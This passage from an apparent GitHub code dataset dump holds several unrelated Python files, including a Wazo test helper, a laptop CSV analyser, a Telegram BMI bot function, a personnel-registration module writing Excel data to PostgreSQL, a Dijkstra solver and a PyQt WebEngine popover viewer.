'agid'\n\n @classmethod\n def reset_clients(cls):\n for attr in ('agid', 'db', 'calld', 'confd', 'agentd', 'filesystem', 'dird'):\n delattr(cls, attr)\n until.true(cls.agid.is_ready, timeout=30)\n\n @classmethod\n def launch_service_with_asset(cls) -> None:\n \"\"\"Make sure Agid service is up before starting first test.\"\"\"\n super().launch_service_with_asset()\n until.true(cls.agid.is_ready, timeout=30)\n\n @cached_class_property\n def agid(cls) -> AgidClient:\n port = cls.service_port(4573, 'agid')\n return AgidClient('127.0.0.1', port)\n\n @cached_class_property\n def confd(cls) -> ConfdMockClient:\n port = cls.service_port('9486', 'confd')\n return ConfdMockClient('127.0.0.1', port, version='1.1')\n\n @cached_class_property\n def agentd(cls) -> AgentdMockClient:\n return AgentdMockClient('127.0.0.1', cls.service_port('9493', 'agentd'))\n\n @cached_class_property\n def calld(cls) -> CalldMockClient:\n return CalldMockClient('127.0.0.1', cls.service_port('9500', 'calld'))\n\n @cached_class_property\n def dird(cls) -> DirdMockClient:\n return DirdMockClient(\n '127.0.0.1', cls.service_port('9489', 'dird'), version='0.1'\n )\n\n @cached_class_property\n def db(cls) -> DbHelper | WrongClient:\n try:\n port = cls.service_port(5432, 'postgres')\n except (NoSuchService, NoSuchPort):\n return WrongClient('postgres')\n\n # NOTE(fblackburn): Avoid importing wazo_agid and dependencies in tests,\n # since no database tests are needed\n return DbHelper.build(\n user='asterisk',\n password='proformatique',\n host='127.0.0.1',\n port=port,\n db='asterisk',\n )\n\n @cached_class_property\n def filesystem(cls) -> FileSystemClient:\n return FileSystemClient(execute=cls.docker_exec, 
service_name=cls.service)\n","repo_name":"wazo-platform/wazo-agid","sub_path":"integration_tests/suite/helpers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16147969102","text":"import csv\n\n\nclass Laptop:\n    def __init__(self, manufacturer, model, category, screen_size, screen, cpu, ram, storage, gpu, op_system, op_sys_ver, weight, price):\n        self.brand = manufacturer\n        self.model = model\n        self.category = category\n        self.screen_size = screen_size\n        self.screen = screen\n        self.cpu = cpu\n        self.ram = ram\n        self.storage = storage\n        self.gpu = gpu\n        self.op_system = op_system\n        self.op_sys_ver = op_sys_ver\n        self.weight = weight\n        self.price = price\n\n\ndef get_laptops():\n    laps = []\n    with open(\"/home/davo/Desktop/laptops.csv\") as f:\n        reader = csv.reader(f)\n        for i, row in enumerate(reader):\n            if i == 0:\n                continue\n            laps.append(Laptop(\n                row[0],\n                row[1],\n                row[2],\n                float(row[3].strip('\"')),\n                row[4],\n                row[5],\n                int(row[6].rstrip(\"GB\")),\n                row[7],\n                row[8],\n                row[9],\n                row[10],\n                float(row[11].replace(\",\", \".\").rstrip(\"kgs\")),\n                float(row[12].replace(\",\", \".\"))\n            ))\n    return laps\n\n\ndef highest_price(laps, count):\n    # sort descending so the first count items are the most expensive\n    laps.sort(key=lambda x: x.price, reverse=True)\n    return laps[:count]\n\n\ndef heaviest(laps, count):\n    laps.sort(key=lambda x: x.weight, reverse=True)\n    return laps[:count]\n\n\ndef cheapest(laps, count):\n    laps.sort(key=lambda x: x.price)\n    return laps[0:count]\n\n\ndef brand_count(laps):\n    diction = {}\n    for i in laps:\n        diction[i.brand] = diction.get(i.brand, 0) + 1\n    return diction\n\n\ndef op_count(laps):\n    diction = {}\n    for i in laps:\n        diction[i.op_system] = diction.get(i.op_system, 0) + 1\n    return diction\n\n\ndef ram_count(laps):\n    diction = {}\n    for i in laps:\n        key = f\"{i.ram}GB\"\n        diction[key] = diction.get(key, 0) + 1\n    return diction\n\n\ndef powerful_ram(laps, count):\n    laps.sort(key=lambda x: x.ram, reverse=True)\n    return laps[:count]\n\n\nobj_list = get_laptops()\n\nfor i in highest_price(obj_list, 5):\n    print(f\"{i.brand} : {i.model} : {i.price}\")\n\n\nfor i in cheapest(obj_list, 5):\n    print(f\"{i.brand} : {i.model} : {i.price}\")\n\n\nfor i in heaviest(obj_list, 5):\n    print(f\"{i.brand} : {i.model} : {i.weight}\")\n\n\nfor i in powerful_ram(obj_list, 5):\n    print(f\" {i.brand} : {i.model} : {i.ram}GB\")\n\n\nprint(ram_count(obj_list))\n\nprint(brand_count(obj_list))\n\nprint(op_count(obj_list))\n\n\n","repo_name":"Davitkhachikyan/HTI-1-Practical-Group-2-Davit-Khachikyan","sub_path":"homework_9/laptops.py","file_name":"laptops.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40387871094","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QLabel\nimport os\n\nclass PrincipalIcon(QLabel):\n    def __init__(self, PrincipalGrid):\n        QLabel.__init__(self, PrincipalGrid)\n        self.setMinimumSize(QtCore.QSize(300, 100))\n        self.setMaximumSize(QtCore.QSize(300, 100))\n        self.setStyleSheet(\"background-color: rgb(255,255,255);\")\n        self.setText(\"\")\n        self.setPixmap(QtGui.QPixmap(os.path.join(os.path.dirname(os.path.abspath(__file__)),'icon.png')))\n        self.setScaledContents(False)\n        self.setIndent(0)\n        
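# name the widget so stylesheets and findChild lookups can target it\n        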
self.setObjectName(\"label\")\n","repo_name":"gabgarar/SunMap","sub_path":"CrossEditorProject/View/QtViews/LeftPrincipalPanel/PrincipalIcon.py","file_name":"PrincipalIcon.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"20523063112","text":"from NekoGram import NekoRouter, Neko, Menu\nfrom aiogram import types\nfrom math import pow\n\nROUTER = NekoRouter()\n\n\n@ROUTER.function(name='menu_calculate_bmi_step_2')\nasync def _(_: Menu, message: types.Message, neko: Neko):\n    user_data = await neko.storage.get_user_data(user_id=message.from_user.id)\n    weight = int(user_data['menu_calculate_bmi']['text'])\n    height = int(user_data['menu_calculate_bmi_step_2']['text'])\n\n    \"\"\"\n    With the metric system, the formula for BMI is weight in kilograms divided by height in meters squared. \n    Since height is commonly measured in centimeters, an alternate calculation formula, dividing the weight \n    in kilograms by the height in centimeters squared, and then multiplying the result by 10,000, can be used.\n    \"\"\"\n    bmi = (weight / pow(height, 2)) * 10000\n\n    data = await neko.build_menu(name='bmi_result', obj=message)\n    await data.build(text_format={'bmi': bmi})\n    await neko.storage.set_user_data(user_id=message.from_user.id)\n    await data.send_message()\n","repo_name":"lyteloli/NekoGramBMICalculator","sub_path":"menus/bmi/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4316453286","text":"def name_to_number(name):\n    if name == \"rock\":\n        number = 0\n    elif name == \"Spock\":\n        number = 1\n    elif name == \"paper\":\n        number = 2\n    elif name == \"lizard\":\n        number = 3\n    elif name == \"scissors\":\n        number = 4\n    else:\n        # guard against unknown names so the function cannot raise UnboundLocalError\n        number = None\n        print(\"You aren't playing this game!\")\n    return number\n","repo_name":"arasharn/Interactive-Programming-with-Python","sub_path":"Rock- Paper- Scissors- Lizard- Spock/name_to_number.py","file_name":"name_to_number.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35024519617","text":"import pandas as pd\nfrom website import DB\nfrom website.lib.get_data import get_data, get_cruise\nimport psycopg2\nimport uuid\n\ndef check_content(df, header_row):\n\n    cruise_details_df = get_cruise(DB)\n    CRUISE_NUMBER = str(cruise_details_df['cruise_number'].item())\n\n    missing_first_names = []\n    missing_last_names = []\n    missing_emails = []\n    invalid_emails = []\n    already_registered_personnel = []\n    missing_institutions = []\n    invalid_institutions = []\n    invalid_new_institutions = []\n    new_institution_already_registered = []\n    invalid_orcids = []\n    institutionsToRegister = []\n\n    registered_personnel_df = get_data(DB, 'personnel_'+str(CRUISE_NUMBER))\n    registered_emails = list(registered_personnel_df['email'])\n\n    institutions_df = get_data(DB, 'institutions')\n    registered_institutions = list(institutions_df['full_name'])\n\n    for idx, row in df.iterrows():\n\n        row_num = idx + header_row + 2\n\n        firstName = row['firstName']\n        lastName = row['lastName']\n        email = row['email']\n        orcID = row['orcID']\n        institution = row['institution']\n        institutionToRegister = row['institutionToRegister']\n\n        # Validations for first name\n        if type(firstName) != str:\n            missing_first_names.append(row_num)\n\n        # 
Validations for last name\n if type(lastName) != str:\n missing_last_names.append(row_num)\n\n # Validations for email\n if type(email) != str:\n missing_emails.append(row_num)\n elif '@' not in email:\n invalid_emails.append(row_num)\n elif email in registered_emails:\n already_registered_personnel.append(row_num)\n\n # Validations for OrcID\n if type(orcID) == str:\n if len(orcID) != 37:\n invalid_orcids.append(row_num)\n elif orcID.startswith('https://orcid.org/') == False:\n invalid_orcids.append(row_num)\n else:\n df['orcID'][idx] = 'NULL'\n\n # Validations for institution\n if type(institution) != str or institution == 'Other':\n if type(institutionToRegister) != str:\n missing_institutions.append(row_num)\n elif institutionToRegister in registered_institutions:\n df['institution'][idx] = institutionToRegister\n elif len(institutionToRegister) < 7:\n invalid_new_institutions.append(row_num)\n else:\n institutionsToRegister.append(institutionToRegister)\n df['institution'][idx] = institutionToRegister\n\n elif institution not in registered_institutions:\n invalid_institutions.append(row_num)\n\n duplicates = df[df.duplicated('email', keep=False)]\n duplicate_groups = duplicates.groupby('email').groups\n duplicate_emails = [duplicates.loc[group].index.tolist() for group in duplicate_groups.values()]\n\n content_errors = []\n\n if len(missing_first_names) > 0:\n content_errors.append(\n f'Missing first name for row(s): {missing_first_names}'\n )\n if len(missing_last_names) > 0:\n content_errors.append(\n f'Missing last name for row(s): {missing_last_names}'\n )\n if len(missing_emails) > 0:\n content_errors.append(\n f'Missing email for row(s): {missing_emails}'\n )\n if len(invalid_emails) > 0:\n content_errors.append(\n f'Email must include an @ symbol, row(s): {invalid_emails}'\n )\n if len(already_registered_personnel) > 0:\n content_errors.append(\n f'Person with same email already registered, row(s): {already_registered_personnel}'\n )\n if len(invalid_orcids) > 0:\n content_errors.append(\n f'OrcID should be 37 characers long and begin with https://orcid.org/, row(s): {invalid_orcids}'\n )\n if len(missing_institutions) > 0:\n content_errors.append(\n f'Missing institution, row(s): {missing_institutions}'\n )\n if len(invalid_institutions) > 0:\n content_errors.append(\n f'Institution not registered and should not be listed in institution column, row(s): {invalid_institutions}'\n )\n if len(invalid_new_institutions) > 0:\n content_errors.append(\n f'Institution to register should be at least 7 characters long. Please use the full name. Row(s): {invalid_new_institutions}'\n )\n if len(duplicate_emails) > 0:\n content_errors.append(\n f'Same email address listed more than once in the file. Row(s): {duplicate_emails}'\n )\n\n institutionsToRegister = list(set(institutionsToRegister))\n\n return content_errors, institutionsToRegister, df\n\ndef register_personnel_from_file(f):\n\n cruise_details_df = get_cruise(DB)\n CRUISE_NUMBER = str(cruise_details_df['cruise_number'].item())\n\n good = True\n errors = []\n\n if f.filename == '':\n good = False\n errors.append('No file selected')\n return good, errors\n\n else:\n\n filepath = '/tmp/'+f.filename\n f.save(filepath)\n\n header_row = 5 # Hidden row on row 10\n\n if filepath.endswith(\".xlsx\"):\n try:\n df = pd.read_excel(filepath, sheet_name = 'Personnel', header=header_row)\n except:\n errors.append(\"Data couldn't be read from the Personnel sheet. Did you upload the correct file? 
The column headers should be on hidden row 6.\")\n                good = False\n                return good, errors\n\n            content_errors, institutionsToRegister, df = check_content(df, header_row)\n\n            errors = errors + content_errors\n            if len(errors) > 0:\n                good = False\n                return good, errors\n\n            else:\n                conn = psycopg2.connect(**DB)\n                cur = conn.cursor()\n                for institution in institutionsToRegister:\n                    # parameterised queries keep quotes in user-supplied names from breaking the SQL\n                    cur.execute(\"INSERT INTO institutions (id, full_name, created) VALUES (%s, %s, CURRENT_TIMESTAMP);\", (str(uuid.uuid4()), institution))\n\n                for idx, row in df.iterrows():\n                    first_name = row['firstName']\n                    last_name = row['lastName']\n                    email = row['email']\n                    personnel = f\"{first_name} {last_name} ({email})\"\n                    orcid = row['orcID']\n                    institution = row['institution']\n                    if type(orcid) == str and orcid != 'NULL':\n                        # the table name cannot be a placeholder, but every value can\n                        cur.execute(f\"INSERT INTO personnel_{CRUISE_NUMBER} (id, personnel, first_name, last_name, institution, email, orcid, created) VALUES (%s, %s, %s, %s, %s, %s, %s, CURRENT_TIMESTAMP);\", (str(uuid.uuid4()), personnel, first_name, last_name, institution, email, orcid))\n                    else:\n                        cur.execute(f\"INSERT INTO personnel_{CRUISE_NUMBER} (id, personnel, first_name, last_name, institution, email, created) VALUES (%s, %s, %s, %s, %s, %s, CURRENT_TIMESTAMP);\", (str(uuid.uuid4()), personnel, first_name, last_name, institution, email))\n                conn.commit()\n                cur.close()\n                conn.close()\n\n        else:\n            errors.append('File must be an \"XLSX\" file.')\n            good = False\n\n    return good, errors\n","repo_name":"SIOS-Svalbard/Learnings_from_AeN_logging_system","sub_path":"website/lib/register_personnel_from_file.py","file_name":"register_personnel_from_file.py","file_ext":"py","file_size_in_byte":7339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16725740817","text":"import sys\r\nimport heapq\r\n\r\ninput = sys.stdin.readline\r\n\r\ndef djikstra(start):\r\n    global graph\r\n    distances = [0xffffff for _ in range(len(graph))]\r\n    distances[start] = 0\r\n    Q = []\r\n    heapq.heappush(Q, (distances[start], start))\r\n\r\n    while Q:\r\n\r\n        current_distance, current_destination = heapq.heappop(Q)\r\n        if distances[current_destination] < current_distance:\r\n            continue\r\n\r\n        for new_destination, new_distance in graph[current_destination]:\r\n            distance = current_distance + new_distance\r\n            if distance < distances[new_destination]:\r\n                distances[new_destination] = distance\r\n                heapq.heappush(Q, (distance, new_destination))\r\n\r\n    return distances\r\n\r\n\r\n\r\n\r\nN, E = map(int, input().split())\r\ngraph = [[] for _ in range(N)]\r\nfor _ in range(E):\r\n    a, b, w = map(int, input().split())\r\n    graph[a - 1].append((b - 1, w))\r\n    graph[b - 1].append((a - 1, w))\r\nv1, v2 = map(int, input().split())\r\n\r\nbasic_distance = djikstra(0)\r\nv1_distance = djikstra(v1 - 1)\r\nv2_distance = djikstra(v2 - 1)\r\nans = min(basic_distance[v1 - 1] + v1_distance[v2 - 1] + v2_distance[N - 1], basic_distance[v2 - 1] + v2_distance[v1 - 1] + v1_distance[N - 1])\r\nif ans >= 0xffffff:\r\n    ans = -1\r\nprint(ans)\r\n","repo_name":"bshello/Algo","sub_path":"백준/Gold/1504. 
특정한 최단 경로/특정한 최단 경로.py","file_name":"특정한 최단 경로.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6166933985","text":"from genericpath import isfile\nimport os\nimport config\nimport shortcut as sc\nif config.qtLibrary == \"pyside6\":\n from PySide6.QtGui import QKeySequence, QAction, QShortcut\n from PySide6.QtWidgets import QFileDialog, QInputDialog, QLineEdit\n from PySide6.QtCore import Qt, QUrl\n from PySide6.QtWidgets import QMenu\n from PySide6.QtWebEngineCore import QWebEnginePage\n from PySide6.QtWebEngineWidgets import QWebEngineView\nelse:\n from qtpy.QtGui import QKeySequence\n from qtpy.QtWidgets import QFileDialog, QInputDialog, QLineEdit, QShortcut\n from qtpy.QtCore import Qt, QUrl\n from qtpy.QtWidgets import QAction, QMenu\n from qtpy.QtWebEngineWidgets import QWebEngineView, QWebEnginePage\n\n\nclass WebEngineViewPopover(QWebEngineView):\n\n def __init__(self, parent, name, source, windowTitle=\"\", enableCloseAction=True):\n super().__init__()\n self.parent = parent\n self.name = name\n self.enableCloseAction = enableCloseAction\n self.wsName = \"reader\"\n self.wsFilename = \"\"\n self.source = source\n self.html = None\n self.setWindowTitle(windowTitle if windowTitle else \"Unique Bible App\")\n self.titleChanged.connect(self.popoverTextCommandChanged)\n self.page().loadFinished.connect(self.finishViewLoading)\n # add context menu (triggered by right-clicking)\n self.setContextMenuPolicy(Qt.ActionsContextMenu)\n self.addMenuActions()\n self.setupKeyboardShortcuts()\n\n def setupKeyboardShortcuts(self):\n if hasattr(self.parent, \"name\") and self.parent.name == \"workspace\":\n shortcut = QShortcut(QKeySequence(sc.swapWorkspaceWithMainWindow), self)\n shortcut.activated.connect(self.parent.parent.swapWorkspaceWithMainWindow)\n\n def finishViewLoading(self):\n activeVerseNoColour = config.darkThemeActiveVerseColor if config.theme == \"dark\" else config.lightThemeActiveVerseColor\n # scroll to the study verse\n self.page().runJavaScript(\"var activeVerse = document.getElementById('v\"+str(config.studyB)+\".\"+str(config.studyC)+\".\"+str(config.studyV)+\"'); if (typeof(activeVerse) != 'undefined' && activeVerse != null) { activeVerse.scrollIntoView(); activeVerse.style.color = '\"+activeVerseNoColour+\"'; } else if (document.getElementById('v0.0.0') != null) { document.getElementById('v0.0.0').scrollIntoView(); }\")\n if not self.htmlStored:\n self.page().toHtml(self.getHtml)\n \n def load(self, url):\n try:\n filepath = url.toLocalFile()\n if os.path.isfile(filepath):\n with open(filepath, 'r', encoding='utf8') as fileObj:\n self.html = fileObj.read()\n self.htmlStored = True\n else:\n self.htmlStored = False\n except:\n self.htmlStored = False\n super().load(url)\n\n def setHtml(self, html, baseUrl=QUrl()):\n if config.bibleWindowContentTransformers:\n for transformer in config.bibleWindowContentTransformers:\n html = transformer(html)\n self.html = html\n self.htmlStored = True\n super().setHtml(html, baseUrl)\n\n def getHtml(self, html):\n # store html in a variable when page is finished loading to facilitate file saving\n self.html = html\n self.htmlStored = True\n\n def popoverTextCommandChanged(self, newTextCommand):\n # reset document.title\n changeTitle = \"document.title = 'UniqueBible.app';\"\n self.page().runJavaScript(changeTitle)\n # run textCommandChanged from parent\n if not newTextCommand == \"ePubViewer.html\" and not 
newTextCommand.endswith(\".pdf\") and not newTextCommand.startswith(\"viewer.html\"):\n #print(newTextCommand, self.source)\n config.mainWindow.textCommandChanged(newTextCommand, self.source)\n\n def addToWorkspaceReadOnly(self):\n if self.htmlStored:\n self.addToWorkspaceReadOnlyAction(self.html)\n else:\n self.page().toHtml(self.addToWorkspaceReadOnlyAction)\n\n def addToWorkspaceEditable(self):\n if self.htmlStored:\n self.addToWorkspaceEditableAction(self.html)\n else:\n self.page().toHtml(self.addToWorkspaceEditableAction)\n\n def addToWorkspaceReadOnlyAction(self, html):\n windowTitle = self.windowTitle() if not self.windowTitle() == \"Unique Bible App\" else \"\"\n config.mainWindow.addToWorkspaceReadOnlyAction(html, windowTitle)\n\n def addToWorkspaceEditableAction(self, html):\n windowTitle = self.windowTitle() if not self.windowTitle() == \"Unique Bible App\" else \"\"\n config.mainWindow.addToWorkspaceEditableAction(html, windowTitle)\n\n def addMenuActions(self):\n\n if hasattr(self.parent, \"name\") and self.parent.name == \"workspace\":\n action = QAction(self)\n action.setText(config.thisTranslation[\"changeWindowTitle\"])\n action.triggered.connect(self.changeWindowTitle)\n self.addAction(action)\n\n action = QAction(self)\n action.setText(config.thisTranslation[\"openInEditor\"])\n action.triggered.connect(self.openInEditor)\n self.addAction(action)\n else:\n subMenu1 = QMenu()\n action = QAction(self)\n action.setText(config.thisTranslation[\"readOnly\"])\n action.triggered.connect(self.addToWorkspaceReadOnly)\n subMenu1.addAction(action)\n action = QAction(self)\n action.setText(config.thisTranslation[\"editable\"])\n action.triggered.connect(self.addToWorkspaceEditable)\n subMenu1.addAction(action)\n\n subMenu2 = QMenu()\n action = QAction(self)\n action.setText(config.thisTranslation[\"readOnly\"])\n action.triggered.connect(self.addTextSelectionToWorkspace)\n subMenu2.addAction(action)\n action = QAction(self)\n action.setText(config.thisTranslation[\"editable\"])\n action.triggered.connect(lambda: self.addTextSelectionToWorkspace(editable=True))\n subMenu2.addAction(action)\n\n subMenu3 = QMenu()\n action = QAction(self)\n action.setText(config.thisTranslation[\"readOnly\"])\n action.triggered.connect(self.addBibleReferencesInTextSelectionToWorkspace)\n subMenu3.addAction(action)\n action = QAction(self)\n action.setText(config.thisTranslation[\"editable\"])\n action.triggered.connect(lambda: self.addBibleReferencesInTextSelectionToWorkspace(editable=True))\n subMenu3.addAction(action)\n\n subMenu = QMenu()\n action = QAction(self)\n action.setText(config.thisTranslation[\"all\"])\n action.setMenu(subMenu1)\n subMenu.addAction(action)\n action = QAction(self)\n action.setText(config.thisTranslation[\"textOnly\"])\n action.setMenu(subMenu2)\n subMenu.addAction(action)\n action = QAction(self)\n action.setText(config.thisTranslation[\"bibleReferencesInTextSelection\"])\n action.setMenu(subMenu3)\n subMenu.addAction(action)\n\n action = QAction(self)\n action.setText(config.thisTranslation[\"addToWorkSpace\"])\n action.setMenu(subMenu)\n self.addAction(action)\n\n separator = QAction(self)\n separator.setSeparator(True)\n self.addAction(separator)\n\n copyText = QAction(self)\n copyText.setText(config.thisTranslation[\"context1_copy\"])\n copyText.triggered.connect(self.copySelectedText)\n self.addAction(copyText)\n\n action = QAction(self)\n action.setText(config.thisTranslation[\"saveHtml\"])\n action.triggered.connect(self.saveHtml)\n self.addAction(action)\n\n 
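# a separator QAction draws a divider line between sections of the context menu\n        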
separator = QAction(self)\n separator.setSeparator(True)\n self.addAction(separator)\n\n subMenu = QMenu()\n\n if not self.name == \"popover\":\n action = QAction(self)\n action.setText(\"{0} | {1}\".format(config.thisTranslation[\"openOnNewWindow\"], sc.displayReferenceOnNewWindowPopover))\n action.setShortcut(QKeySequence(sc.displayReferenceOnNewWindowPopover))\n action.triggered.connect(self.displayVersesInNewWindow)\n subMenu.addAction(action)\n\n action = QAction(self)\n action.setText(\"{0} | {1}\".format(config.thisTranslation[\"bar1_menu\"], sc.displayReferenceOnBibleWindowPopover))\n action.setShortcut(QKeySequence(sc.displayReferenceOnBibleWindowPopover))\n action.triggered.connect(self.displayVersesInBibleWindow)\n subMenu.addAction(action)\n\n action = QAction(self)\n action.setText(config.thisTranslation[\"bottomWindow\"])\n action.triggered.connect(self.displayVersesInBottomWindow)\n subMenu.addAction(action)\n\n action = QAction(self)\n action.setText(\"{0} | {1}\".format(config.thisTranslation[\"presentation\"], sc.presentPopover))\n action.setShortcut(QKeySequence(sc.presentPopover))\n action.triggered.connect(self.displayVersesInPresentation)\n subMenu.addAction(action)\n\n action = QAction(self)\n action.setText(config.thisTranslation[\"displayVerses\"])\n action.setMenu(subMenu)\n self.addAction(action)\n\n if hasattr(config, \"macroIsRunning\") and config.macroIsRunning:\n spaceBar = QAction(self)\n spaceBar.setShortcut(QKeySequence(\" \"))\n spaceBar.triggered.connect(self.spaceBarPressed)\n self.addAction(spaceBar)\n \n escKey = QAction(self)\n escKey.setShortcut(QKeySequence(Qt.Key_Escape))\n escKey.triggered.connect(self.escKeyPressed)\n self.addAction(escKey)\n\n qKey = QAction(self)\n qKey.setShortcut(QKeySequence(Qt.Key_Q))\n qKey.triggered.connect(self.qKeyPressed)\n self.addAction(qKey)\n \n subMenu = QMenu()\n\n action = QAction(self)\n action.setText(config.thisTranslation[\"bar2_menu\"])\n action.triggered.connect(self.openInStudyWindow)\n subMenu.addAction(action)\n \n escKey = QAction(self)\n escKey.setText(config.thisTranslation[\"menu1_fullScreen\"])\n escKey.setShortcut(QKeySequence(Qt.Key_Escape))\n escKey.triggered.connect(self.escKeyPressed)\n subMenu.addAction(escKey)\n\n action = QAction(self)\n action.setText(config.thisTranslation[\"displayContent\"])\n action.setMenu(subMenu)\n self.addAction(action)\n\n separator = QAction(self)\n separator.setSeparator(True)\n self.addAction(separator)\n\n action = QAction(self)\n action.setText(\"{0} | {1}\".format(config.thisTranslation[\"context1_search\"], sc.searchPopover))\n action.setShortcut(QKeySequence(sc.searchPopover))\n action.triggered.connect(self.searchPanel)\n self.addAction(action)\n \n runAsCommandLine = QAction(self)\n runAsCommandLine.setText(\"{0} | {1}\".format(config.thisTranslation[\"context1_command\"], sc.runCommandPopover))\n runAsCommandLine.setShortcut(QKeySequence(sc.runCommandPopover))\n runAsCommandLine.triggered.connect(self.runAsCommand)\n self.addAction(runAsCommandLine)\n\n separator = QAction(self)\n separator.setSeparator(True)\n self.addAction(separator)\n\n if self.enableCloseAction and not (hasattr(self.parent, \"name\") and self.parent.name == \"workspace\"):\n qKey = QAction(self)\n qKey.setText(\"{0} | {1}\".format(config.thisTranslation[\"close\"], sc.closePopoverWindow))\n qKey.setShortcut(QKeySequence(sc.closePopoverWindow))\n qKey.triggered.connect(self.qKeyPressed)\n self.addAction(qKey)\n\n def openInEditor(self):\n 
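# toPlainText is asynchronous; the callback receives the extracted text\n        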
self.page().toPlainText(self.openInEditorAction)\n\n def openInEditorAction(self, plainText):\n windowTitle = self.windowTitle()\n html = config.mainWindow.htmlWrapper(plainText, parsing=True, html=False)\n self.parent.addHtmlContent(html, True, windowTitle)\n\n def messageNoSelection(self):\n config.mainWindow.studyView.currentWidget().displayMessage(\"{0}\\n{1}\".format(config.thisTranslation[\"message_run\"], config.thisTranslation[\"selectTextFirst\"]))\n\n def copySelectedText(self):\n if not self.selectedText():\n self.messageNoSelection()\n else:\n self.page().triggerAction(QWebEnginePage.Copy)\n\n def displayVersesInNewWindow(self):\n selectedText = self.selectedText().strip()\n config.mainWindow.studyView.currentWidget().displayVersesInNewWindow(selectedText)\n \n def displayVersesInBibleWindow(self):\n selectedText = self.selectedText().strip()\n config.mainWindow.studyView.currentWidget().displayVersesInBibleWindow(selectedText)\n\n def displayVersesInBottomWindow(self):\n selectedText = self.selectedText().strip()\n config.mainWindow.studyView.currentWidget().displayVersesInBottomWindow(selectedText)\n\n def displayVersesInPresentation(self):\n selectedText = self.selectedText().strip()\n config.mainWindow.studyView.currentWidget().runPlugin(\"Presentation_Ctrl+Shift+Y\", selectedText)\n\n def searchPanel(self):\n selectedText = self.selectedText().strip()\n config.mainWindow.studyView.currentWidget().searchPanel(selectedText)\n\n def openInStudyWindow(self):\n if self.name.lower().endswith(\"pdf\"):\n openPdfViewerInNewWindow = config.openPdfViewerInNewWindow\n config.openPdfViewerInNewWindow = False\n config.mainWindow.openPdfReader(self.name, fullPath=True)\n config.openPdfViewerInNewWindow = openPdfViewerInNewWindow\n elif self.name == \"EPUB\":\n config.mainWindow.runPlugin(\"ePub Viewer\")\n else:\n if self.htmlStored:\n self.openHtmlInStudyWindow(self.html)\n else:\n self.page().toHtml(self.openHtmlInStudyWindow)\n self.close()\n \n def openHtmlInStudyWindow(self, html):\n config.mainWindow.openTextOnStudyView(html, tab_title=\"study\")\n\n def runAsCommand(self):\n selectedText = self.selectedText()\n config.mainWindow.textCommandChanged(selectedText, \"main\")\n\n def closeEvent(self, event):\n if hasattr(config, \"macroIsRunning\") and config.macroIsRunning:\n config.pauseMode = False\n\n def spaceBarPressed(self):\n if hasattr(config, \"macroIsRunning\") and config.macroIsRunning:\n config.pauseMode = False\n\n def qKeyPressed(self):\n if hasattr(config, \"macroIsRunning\") and config.macroIsRunning:\n config.quitMacro = True\n config.pauseMode = False\n self.close()\n\n def escKeyPressed(self):\n if self.isMaximized():\n self.showFullScreen()\n else:\n self.showMaximized()\n\n def saveHtml(self, fileName=\"\"):\n if self.html is None:\n if not fileName:\n if self.htmlStored:\n self.saveHtmlToFile(self.html)\n else:\n self.page().toHtml(self.saveHtmlToFile)\n else:\n if self.htmlStored:\n self.saveHtmlToFileAction(self.html, fileName)\n else:\n self.page().toHtml(lambda html, fileName=fileName: self.saveHtmlToFileAction(html, fileName))\n else:\n if not fileName:\n self.saveHtmlToFile(self.html)\n else:\n self.saveHtmlToFileAction(self.html, fileName)\n\n def saveHtmlToFile(self, html):\n options = QFileDialog.Options()\n fileName, *_ = QFileDialog.getSaveFileName(self,\n config.thisTranslation[\"note_saveAs\"],\n \"\",\n \"HTML Files (*.html)\", \"\", options)\n if fileName:\n if not os.path.basename(fileName).lower().endswith(\".html\"):\n fileName = fileName + 
\".html\"\n self.saveHtmlToFileAction(html, fileName, True)\n\n def saveHtmlToFileAction(self, html, fileName, showSavedMessage=False):\n with open(fileName, \"w\", encoding=\"utf-8\") as fileObj:\n fileObj.write(html)\n if showSavedMessage:\n config.mainWindow.displayMessage(config.thisTranslation[\"saved\"])\n\n def changeWindowTitle(self, windowTitle=\"\"):\n if self.parent is config.mainWindow.ws:\n if not windowTitle:\n windowTitle, ok = QInputDialog.getText(self, config.thisTranslation[\"changeWindowTitle\"],\n config.thisTranslation[\"enter_text_here\"], QLineEdit.Normal,\n \"\")\n if ok and windowTitle:\n self.setWindowTitle(windowTitle)\n self.parent.saveWorkspace()\n else:\n self.setWindowTitle(windowTitle)\n self.parent.saveWorkspace()\n\n def addTextSelectionToWorkspace(self, selectedText=None, editable=False):\n if not selectedText:\n selectedText = self.selectedTextProcessed()\n if selectedText:\n config.mainWindow.addTextSelectionToWorkspace(selectedText, editable)\n else:\n self.messageNoSelection()\n\n def addBibleReferencesInTextSelectionToWorkspace(self, selectedText=None, editable=False):\n if not selectedText:\n selectedText = self.selectedTextProcessed()\n if selectedText:\n config.mainWindow.addBibleReferencesInTextSelectionToWorkspace(selectedText, editable)\n else:\n self.messageNoSelection()\n\n def selectedTextProcessed(self, activeSelection=False):\n if not activeSelection:\n selectedText = self.selectedText().strip()\n else:\n selectedText = config.mainWindow.mainView.currentWidget().selectedText().strip()\n if not selectedText:\n selectedText = config.mainWindow.studyView.currentWidget().selectedText().strip()\n if not selectedText and config.commandTextIfNoSelection:\n selectedText = config.mainWindow.textCommandLineEdit.text().strip()\n if not selectedText:\n text, ok = QInputDialog.getText(config.mainWindow, \"Unique Bible App\",\n config.thisTranslation[\"enter_text_here\"], QLineEdit.Normal,\n \"\")\n if ok and text:\n selectedText = text\n return selectedText\n\n def searchText(self, searchString):\n self.findText(searchString, 